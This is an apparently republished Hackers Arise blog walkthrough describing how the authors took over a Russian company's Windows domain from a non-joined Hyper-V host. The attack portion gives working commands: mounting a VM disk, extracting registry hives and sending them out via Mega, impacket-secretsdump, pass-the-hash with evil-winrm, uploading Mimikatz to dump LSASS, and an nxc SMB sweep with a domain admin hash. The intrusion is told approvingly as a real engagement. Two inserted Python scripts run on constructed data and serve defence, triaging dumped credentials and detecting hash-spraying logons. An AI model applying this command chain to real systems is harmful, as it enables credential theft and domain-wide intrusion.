The post Taking Over a Russian Domain using Techniques from Digital Forensics first appeared on Hackers Arise.

Welcome back, cyberwarriors.
Cyber Cossacks here with a new walkthrough. In a recent engagement, we managed to take control of an entire domain starting from a separate machine that wasn’t joined to it. In modern enterprise networks, virtualization and segmented infrastructure are often used as safeguards. For some administrators it’s an architectural illusion of security meant to prevent a compromise in one part of the system from cascading into another. But when misconfigured, these same layers become the path an attacker needs. Our goal is to show you how a single isolated virtual machine intentionally placed outside the domain served as the pivot point for a full domain compromise inside a Russian company.
Initial Foothold

The Windows machine we gained access to was primarily used to host Bitrix virtual machines. Bitrix is a well-known Russian platform that helps businesses organize their communication and operations. Managing Bitrix requires technical know-how, which is why companies usually outsource the task to third-party providers. This introduces a supply chain risk if credentials are not handled carefully. The Bitrix VMs are Linux machines that tend to be restricted in functionality but still provide enough to maintain access and route traffic. In our case, we landed on a Fedora machine without Python installed, a minor inconvenience but not an obstacle. This Windows host served as our pivot point into the internal infrastructure.

In one of our classes, OTW showed us that digital forensics is not only useful to defenders. Offline disk images, registry hives, and memory dumps often contain enough credential residue to stage a complete compromise. This engagement proves it clearly; here is how we put it into action.
Hyper-V

Inside Hyper-V, several virtual machines were stored, some Linux-based and others Windows systems that were broken or powered off. Of particular interest was a Windows VM that prompted for domain credentials on boot, confirming its membership in the organization’s Active Directory domain. Rather than attempt a live attack on the running system, we chose a cleaner approach. We shut it down and mounted its virtual hard disk directly on the Hyper-V host.

The virtual disk was located on the E: drive. Using Disk Management, we selected “Action” followed by “Attach VHD,” which mounted the VHD and exposed its partitions.


Drives H: and I: appeared. The larger one, I: in our case, held the files we were after.
Hives
Our next goal was to pull the registry hives that store credential material. SAM holds the password hashes of local accounts, SECURITY holds cached domain logon verifiers and LSA secrets, and SYSTEM holds the boot key needed to decrypt both. The files we needed were SAM, SECURITY, and SYSTEM. You can find them in:
I:\Windows\System32\config\

We transferred them off the host using Mega, which gave us a clean bridge to our Kali system for offline analysis.
Attacking SAM
On Kali, we used the secretsdump.py utility from Impacket to process the hives:
kali > impacket-secretsdump -sam SAM -security SECURITY -system SYSTEM LOCAL

This gave us the local Administrator’s NTLM hash and DCC2 (cached domain credential) hashes for several domain users. DCC2 hashes can’t be passed the way NTLM hashes can and must be cracked first, so success there depends on the quality of your wordlist. Thankfully, we had the Administrator’s NTLM hash, which was enough to authenticate to the running VM and try to dump LSASS.
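From the responder's side, the same dump answers a different question: which credentials must be rotated now that these hives have left the host. The script below is an added example, not part of the original post; it parses a constructed secretsdump-style sample (every hash is fake) using the line formats Impacket prints for SAM entries, DCC2 cached logons and the $MACHINE.ACC secret, and turns them into a rotation list.

```python
import re

# Constructed secretsdump-style output for the example; every hash is fake.
SAMPLE_DUMP = """\
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Dumping cached domain logon information (domain/username:hash)
CORP.LOCAL/jdoe:$DCC2$10240#jdoe#fedcba9876543210fedcba9876543210: (2024-01-01 10:00:00)
CORP.LOCAL/da_backup:$DCC2$10240#da_backup#00112233445566778899aabbccddeeff: (2024-01-02 09:30:00)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
CORP\\WS01$:aad3b435b51404eeaad3b435b51404ee:aabbccddeeff00112233445566778899:::
"""

EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of the empty password
SAM_RE = re.compile(r"^(?P<user>[^:/\\]+):(?P<rid>\d+):[0-9a-f]{32}:(?P<nt>[0-9a-f]{32}):::$")
DCC2_RE = re.compile(r"^(?P<domain>[^/:]+)/(?P<user>[^:]+):\$DCC2\$(?P<iter>\d+)#[^#]+#[0-9a-f]{32}")
MACH_RE = re.compile(r"^(?P<domain>[^\\:]+)\\(?P<host>[^:]+\$):[0-9a-f]{32}:[0-9a-f]{32}:::$")

def triage(dump_text):
    """Classify every credential line so a responder knows what to rotate."""
    rep = {"local": {}, "cached": [], "machine": [], "findings": []}
    for line in dump_text.splitlines():
        if (m := MACH_RE.match(line)):          # computer account secret from LSA
            rep["machine"].append(f"{m['domain']}\\{m['host']}")
            rep["findings"].append(f"reset computer account {m['host']} (leaked machine secret)")
        elif (m := SAM_RE.match(line)):         # local account from SAM
            rep["local"][m["user"]] = m["nt"]
            if m["rid"] == "500" and m["nt"] != EMPTY_NT:
                rep["findings"].append("built-in Administrator NT hash recovered: it is directly "
                                       "usable for Pass-the-Hash; rotate it here and on every host "
                                       "that shares the same local admin password (use LAPS)")
            elif m["nt"] == EMPTY_NT:
                rep["findings"].append(f"{m['user']} has a blank password; confirm it is disabled")
        elif (m := DCC2_RE.match(line)):        # cached domain logon from SECURITY
            rep["cached"].append(f"{m['domain']}\\{m['user']}")
            rep["findings"].append(f"domain user {m['user']}: DCC2 (cached, {m['iter']} rounds) "
                                   f"cannot be passed but can be cracked; force a password reset")
    if rep["cached"]:
        rep["findings"].append("cached domain logons present: lower CachedLogonsCount on hosts "
                               "that do not need offline logon, and keep admins from logging on here")
    return rep

if __name__ == "__main__":
    print("\n".join(triage(SAMPLE_DUMP)["findings"]))
```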
Connect to the target using Evil-WinRM:
kali > evil-winrm -i

This technique is known as Pass-the-Hash: the NTLM hash is presented for authentication instead of the real password. Luckily, no antivirus was running, so we uploaded Mimikatz:
*Evil-WinRM* PS C:\> upload /root/mimikatz.exe C:\\Windows\\Temp\\mimikatz.exe
Attacking LSASS
We used Mimikatz to dump LSASS memory:
C:\Windows\Temp> .\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"

That worked. We pulled NTLM hashes for domain users. With a bit of digging, we found the hash of a domain admin.
NXC
To verify the hash was still valid and useful, we ran NXC to check access to other machines in the domain:
kali > nxc smb 192.168.0.1/24 -u admin -H

The scan shows multiple systems that accepted the credentials. Lateral movement from this point would be trivial. We had achieved full control over the domain starting from a machine that was never meant to be connected to it in the first place.
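The sweep above is the loud part of this chain: one source address, one privileged account, many hosts, all over NTLM. The detector below is an added example, not from the original post, and runs over constructed Security 4624 (logon type 3) records rather than real telemetry; the privileged-account set, the jump-host allowlist, the 5-minute window and the fan-out threshold are all assumptions to tune for your environment.

```python
from collections import defaultdict
from datetime import datetime, timedelta

PRIVILEGED = {"admin", "administrator"}    # assumed: accounts that should never roam over NTLM
ADMIN_JUMP_HOSTS = {"192.168.0.10"}        # assumed: the only sources admins may log on from
WINDOW, FANOUT = timedelta(minutes=5), 3   # alert at N distinct hosts inside the window

def ev(t, host, user, auth_pkg, key_len, src_ip):
    """One 4624 network-logon record reduced to the fields the rules use (constructed)."""
    return {"time": t, "host": host, "user": user, "logon_type": 3,
            "auth_pkg": auth_pkg, "key_len": key_len, "src_ip": src_ip}

EVENTS = [  # constructed sample: a sweep from a non-domain host, plus benign noise
    ev("2024-05-01T10:00:01", "WS02", "admin", "NTLM", 0, "192.168.0.50"),
    ev("2024-05-01T10:00:05", "FS01", "admin", "NTLM", 0, "192.168.0.50"),
    ev("2024-05-01T10:00:12", "SQL01", "admin", "NTLM", 0, "192.168.0.50"),
    ev("2024-05-01T10:00:40", "DC01", "admin", "NTLM", 0, "192.168.0.50"),
    ev("2024-05-01T10:00:41", "DC01", "admin", "NTLM", 128, "192.168.0.10"),   # jump host
    ev("2024-05-01T10:01:00", "FS01", "jdoe", "Kerberos", 256, "192.168.0.20"),  # ordinary user
    ev("2024-05-01T11:30:00", "WS07", "admin", "NTLM", 0, "192.168.0.50"),     # outside window
]

def suspicious_ntlm(events):
    """Privileged NTLM network logons from anywhere but the admin jump hosts."""
    return [e for e in events if e["logon_type"] == 3 and e["auth_pkg"] == "NTLM"
            and e["user"].lower() in PRIVILEGED and e["src_ip"] not in ADMIN_JUMP_HOSTS]

def detect_sweep(events, window=WINDOW, fanout=FANOUT):
    """Alert when one (source IP, account) reaches >= fanout hosts within the window."""
    by_key = defaultdict(list)
    for e in sorted(suspicious_ntlm(events), key=lambda e: e["time"]):
        by_key[(e["src_ip"], e["user"].lower())].append(e)
    alerts = []
    for (src, user), evs in by_key.items():
        for i, first in enumerate(evs):  # slide the window over the sorted logons
            t0 = datetime.fromisoformat(first["time"])
            hosts = {x["host"] for x in evs[i:]
                     if datetime.fromisoformat(x["time"]) - t0 <= window}
            if len(hosts) >= fanout:
                # KeyLength 0 is common for tool-driven NTLM logons: a hint, not proof of PtH
                alerts.append({"src_ip": src, "user": user, "first_seen": first["time"],
                               "hosts": sorted(hosts),
                               "pth_hint": all(x["key_len"] == 0 for x in evs[i:])})
                break
    return alerts
```

Fed from a SIEM export, the same rule isolates the source that sprayed a domain admin's hash across the subnet and gives the host list to start containment from.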
Conclusion
Digital forensics isn’t just a defensive tool. When used creatively, it can help attackers pull credentials from offline systems and move through a network. This time, one seemingly isolated Windows machine gave us everything we needed. By mounting a dormant virtual disk and extracting registry hives, we got the credentials without any exploit. The result was domain-wide administrative control. We showed that in complex networks, poor segmentation can be exploited just as effectively as live vulnerabilities.
Source: HackersArise
Source Link: https://hackers-arise.com/taking-over-a-russian-domain-using-techniques-from-digital-forensics/